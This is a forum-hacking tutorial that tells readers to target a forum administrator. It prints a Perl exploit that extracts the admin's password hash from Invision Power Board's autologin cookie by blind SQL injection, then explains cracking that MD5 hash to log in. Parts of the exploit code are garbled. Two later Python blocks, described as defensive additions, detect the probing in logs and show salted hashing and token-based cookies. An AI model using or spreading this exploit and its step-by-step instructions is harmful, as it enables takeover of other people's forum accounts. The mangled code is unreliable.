First of all, what you need is a forum to hack. Once you have the forum, the next step is to find the user you want to hack. Common sense says you want the admin. The administrator is usually the first member of the forum, so his/her User ID will be "1". Find the User ID of the administrator, or of the person you wish to hack. For this tutorial, let's say his/her ID is "3".
Now you are almost set to go, because you know the site you wish to hack and the member/administrator you wish to hack. For example: "you are hacking the administrator of http://www.xxxxxxxx.com, which is User ID 3".
Before your dreams come true you need a working exploit. You can use the one given below (preferably for 1.3.1 forums).
--------------------------------------------------------------------------------
#!/usr/bin/perl -w
##################################################################
# This exploit works fine. Just paste the outputted cookie into
# your request header using livehttpheaders or something and you
# will probably be logged in as that user. No need to decrypt it!
# Exploit coded by "Hacker"
##################################################################
use LWP::UserAgent;
$ua = new LWP::UserAgent;
$ua->agent("Mosiac 1.0" . $ua->agent);
if (!$ARGV[0]) {$ARGV[0] = '';}
if (!$ARGV[3]) {$ARGV[3] = '';}
my $path = $ARGV[0] . '/index.php?act=Login&CODE=autologin';
my $user = $ARGV[1]; # userid to jack
my $iver = $ARGV[2]; # version 1 or 2
my $cpre = $ARGV[3]; # cookie prefix
my $dbug = $ARGV[4]; # debug?
if (!$ARGV[2])
{
print "..By Hacker. Usage: ipb.pl http://forums.site.org [id] [ver 1/2].\n";
exit;
}
my @charset = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f");
my $outputs = '';
for( $i=1; $i < j="0;" current =" $charset[$j];" sql =" (" cookie =" ('Cookie'"> $cpre . "member_id=31337420; " . $cpre . "pass_hash=" . $sql);
my $res = $ua->get($path, @cookie);
# If we get a valid sql request then this
# does not appear anywhere in the sources
$pattern = '';
$_ = $res->content;
if ($dbug) { print };
if ( !(/$pattern/) )
{
$outputs .= $current;
print "$current\n";
last;
}
}
if ( length($outputs) < member_id=" . $user . " pass_hash=" . $outputs; exit; # Hacker
--------------------------------------------------------------------------------
For using the above Perl script you need ActivePerl. If you don't already have it, you can get it from here and install it:
Don't close the program if it takes some time; this is the final phase, the one that gives you access to the forum with admin privileges.
Once the hash grabbing is complete, you are returned the full hash and UserID.
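The script above recovers pass_hash one hex character at a time, which means it sends many autologin requests from one source with the same member_id and a cookie value that changes on every request. That shape is visible in the web server's access log. The following Python is an added example written for this page from the defender's side; it is not part of the original post and not the script author's code. It assumes a constructed log format whose two trailing quoted fields are the User-Agent and the raw Cookie header, constructed sample lines, and placeholder cookie values (PROBE_PAYLOAD_n) standing in for whatever the script actually sends.

```python
import re
from collections import defaultdict

# Assumed log format (constructed for this example): combined log format with
# two trailing quoted fields, the User-Agent and the raw Cookie header.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<ua>[^"]*)" "(?P<cookie>[^"]*)"$'
)
HEX32 = re.compile(r'^[0-9a-f]{32}$')   # a genuine pass_hash is a 32-char hex MD5 digest
AUTOLOGIN = 'act=Login&CODE=autologin'   # endpoint the script requests on every probe

# Constructed sample lines. 198.51.100.20 is an ordinary member; 203.0.113.7 plays
# the script: fixed member_id 31337420, a different pass_hash value per request,
# user agent prefixed "Mosiac 1.0" exactly as the script sets it (libwww-perl
# version constructed). PROBE_PAYLOAD_n stands in for whatever the script sends.
SAMPLE_LOG = [
    '198.51.100.20 - - [12/Mar/2008:10:14:55 +0000] "GET /index.php?act=Login&CODE=autologin HTTP/1.1" 200 4120 '
    '"Mozilla/5.0 (X11; Linux)" "ipb_member_id=3; ipb_pass_hash=0123456789abcdef0123456789abcdef"',
    '198.51.100.20 - - [12/Mar/2008:10:14:56 +0000] "GET /index.php?showforum=2 HTTP/1.1" 200 9811 '
    '"Mozilla/5.0 (X11; Linux)" "ipb_member_id=3; ipb_pass_hash=0123456789abcdef0123456789abcdef"',
] + [
    f'203.0.113.7 - - [12/Mar/2008:10:15:{n:02d} +0000] "GET /index.php?act=Login&CODE=autologin HTTP/1.1" 200 4120 '
    f'"Mosiac 1.0libwww-perl/5.805" "ipb_member_id=31337420; ipb_pass_hash=PROBE_PAYLOAD_{n}"'
    for n in range(1, 9)
]


def parse_line(line):
    """Parse one log line into a dict with a 'cookies' mapping; None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    cookies = {}
    for part in rec['cookie'].split(';'):
        if '=' in part:
            name, value = part.strip().split('=', 1)
            cookies[name] = value
    rec['cookies'] = cookies
    return rec


def find_suspicious(lines, burst_threshold=5):
    """Return {ip: [reasons]} for sources whose autologin traffic looks like the
    char-by-char extraction: malformed pass_hash, the script's user agent, or many
    autologin requests whose pass_hash keeps changing."""
    per_ip = defaultdict(lambda: {'autologin': 0, 'hashes': set(), 'reasons': set()})
    for line in lines:
        rec = parse_line(line)
        if rec is None or AUTOLOGIN not in rec['path']:
            continue
        st = per_ip[rec['ip']]
        st['autologin'] += 1
        # The script supports a cookie prefix, so match any name ending in pass_hash.
        ph = next((v for k, v in rec['cookies'].items() if k.endswith('pass_hash')), None)
        if ph is not None:
            st['hashes'].add(ph)
            if not HEX32.match(ph):
                st['reasons'].add('pass_hash not 32 hex chars')
        if rec['ua'].startswith('Mosiac 1.0'):
            st['reasons'].add('user-agent from the published script')
    for st in per_ip.values():
        if st['autologin'] >= burst_threshold and len(st['hashes']) >= burst_threshold:
            st['reasons'].add('autologin burst with changing pass_hash')
    return {ip: sorted(st['reasons']) for ip, st in per_ip.items() if st['reasons']}


if __name__ == '__main__':
    for ip, reasons in find_suspicious(SAMPLE_LOG).items():
        print(ip, '->', '; '.join(reasons))
```

The user-agent check is the weakest of the three signals, since it is trivial to change; the malformed-cookie check and the burst of autologin requests with a changing pass_hash are the ones worth alerting on, and the same burst logic applies to any login endpoint that reads a credential-like value from a cookie.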
Now once you've got the hash, e.g. 8476t3f6534ty3bt6k6g6f4fj3jb1h0m
Don't be confused by these characters; they are useless unless you know how to use them.
This is nothing but the admin's password hashed with the MD5 algorithm.
I think most of you have heard that an MD5 hash is impossible to crack. MD5s are impossible to reverse: "once a string is MD5ed, there is no way to get it back to plain-text".
It is IMPOSSIBLE to decrypt an MD5 hash. But it is NOT impossible to CRACK an MD5 hash: cracking means guessing candidate passwords, hashing each one and comparing the result with the stolen digest (as I already cracked an MD5 hash, so it's not impossible).
You can use any method and any cracker to crack this hash.
Once you are done, i.e. you have cracked the hash, you will have a plain-text password (which is your gateway into the forum).
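The passage above is right that an MD5 digest cannot be reversed and that cracking means guessing and comparing, which is cheap against a fast unsalted hash. The page also shows why the stolen value is so valuable: the autologin cookie carries the password hash itself, so the hash logs you in without any cracking. The following Python is an added example for this page, not code from the original post or from IPB, and it illustrates the two defensive changes that blunt both halves of the attack: salted, slow password hashing so a leaked hash resists guessing, and a remember-me cookie that carries a random token bound to the member id instead of the password hash. The names (hash_password, AutologinStore), the iteration count and the sample password "hunter2" are assumptions of the example.

```python
import hashlib
import hmac
import os
import secrets

# Work factor for PBKDF2; a constructed choice for this example, tune to your hardware.
ITERATIONS = 100_000


def legacy_md5(password):
    """Unsalted MD5, the kind of pass_hash the tutorial talks about. Shown only to
    contrast with the salted, slow scheme below: equal passwords give equal hashes."""
    return hashlib.md5(password.encode()).hexdigest()


def hash_password(password, salt=None):
    """Per-user random salt + PBKDF2-HMAC-SHA256. Two users with the same password
    get different stored values, and each guess costs ITERATIONS hashes, not one."""
    if salt is None:
        salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac('sha256', password.encode(), salt, ITERATIONS)
    return 'pbkdf2_sha256$%d$%s$%s' % (ITERATIONS, salt.hex(), dk.hex())


def verify_password(stored, candidate):
    """Recompute the derived key with the stored salt and compare in constant time."""
    scheme, iters, salt_hex, dk_hex = stored.split('$')
    if scheme != 'pbkdf2_sha256':
        return False
    dk = hashlib.pbkdf2_hmac('sha256', candidate.encode(), bytes.fromhex(salt_hex), int(iters))
    # hmac.compare_digest does not leak how many leading bytes matched.
    return hmac.compare_digest(dk.hex(), dk_hex)


class AutologinStore:
    """Remember-me cookies that carry a random token instead of the password hash.
    The server keeps only SHA-256(token) bound to the member id, so a copy of the
    users table yields no usable cookies and a leaked cookie reveals no password hash."""

    def __init__(self):
        self._by_token_hash = {}   # sha256(token) -> member_id

    @staticmethod
    def _fingerprint(token):
        return hashlib.sha256(token.encode()).hexdigest()

    def issue(self, member_id):
        token = secrets.token_urlsafe(32)
        self._by_token_hash[self._fingerprint(token)] = member_id
        return token                      # goes into the cookie; never stored as-is

    def resolve(self, member_id, token):
        """True only if the token is known AND bound to the member id the cookie claims."""
        if not isinstance(token, str) or len(token) > 64:
            return False                  # reject oversized or non-string cookie values early
        return self._by_token_hash.get(self._fingerprint(token)) == member_id

    def revoke(self, member_id):
        """Drop every autologin token for a member, e.g. after a password change."""
        self._by_token_hash = {h: m for h, m in self._by_token_hash.items() if m != member_id}


if __name__ == '__main__':
    stored = hash_password('hunter2')
    print('stored record:', stored)
    print('verify correct:', verify_password(stored, 'hunter2'))
    store = AutologinStore()
    cookie = store.issue(3)
    print('cookie resolves for member 3:', store.resolve(3, cookie))
    print('same cookie as member 1:', store.resolve(1, cookie))
```

With this layout the value in the browser's cookie is worth nothing after revoke(), and a stolen users table contains neither cookies nor fast-to-guess digests; the member_id check in resolve() is what stops a token issued to one member from being replayed with another member's id, which is the substitution the script's fixed member_id relies on.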